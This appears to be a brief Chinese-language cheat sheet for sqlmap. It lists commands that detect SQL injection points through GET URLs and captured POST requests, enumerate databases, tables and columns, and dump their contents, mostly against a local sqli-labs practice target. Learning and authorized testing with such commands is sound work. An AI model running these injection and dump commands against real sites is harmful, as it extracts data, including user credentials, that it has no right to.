@ZZHow(ZZHow1024)
一、掃描注入點
1.GET方法,給URL:
- #探測該url是否存在漏洞
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1"
- #如果我們已經知道admin這里是注入點的話,可以在其后面加個*來讓sqlmap對其注入
python sqlmap.py -u "http://www.xx.com/username/admin*"
2.POST方法,給抓包文件:
- #bp.txt是我們抓取的http的請求包
python sqlmap.py -r bp.txt
- #指定參數,當有多個參數而你又知道username參數存在SQL漏洞,你就可以使用-p指定參數進行探測
python sqlmap.py -r bp.txt -p username
二、爆基本信息自動化
0.查看當前的數據庫
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1" --current-db
1.爆出所有的數據庫
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1" --dbs
2.爆出所有的數據表
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1" --tables
3.爆出數據庫中所有的字段
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1" --columns
三、爆具體信息自動化
1.爆出數據庫security中的所有的表
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security --tables
2.爆出security數據庫中users表中的所有的字段
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users --columns
爆出數據庫security中的users表中的username字段中的所有數據
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users -C username --dump
四、爆信數據自動化
1.爆出該數據庫中的所有數據
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1" --dump-all
2.爆出數據庫security中的所有數據
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security --dump-all
3.爆出數據庫security中的users表中的所有數據
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users --dump-all